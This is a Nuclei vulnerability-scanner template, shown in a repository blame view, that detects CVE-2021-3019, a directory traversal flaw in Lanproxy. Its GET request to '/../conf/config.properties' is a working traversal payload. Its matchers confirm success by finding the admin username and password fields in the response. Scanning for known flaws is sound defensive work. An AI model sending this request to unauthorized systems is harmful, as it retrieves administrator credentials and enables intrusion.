nuclei-templates/cves/2021/CVE-2021-3019.yaml

31 lines
653 B
YAML
Raw Normal View History

2021-01-30 12:22:35 +00:00
id: CVE-2021-3019
info:
name: Lanproxy Directory Traversal
author: pikpikcu
severity: medium
2021-03-08 14:17:59 +00:00
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019
2021-03-18 07:54:36 +00:00
tags: cve,cve2021,lanproxy,lfi
2021-01-30 12:22:35 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/../conf/config.properties"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/octet-stream"
condition: and
part: header
- type: word
words:
- "config.admin.username"
- "config.admin.password"
condition: and
part: body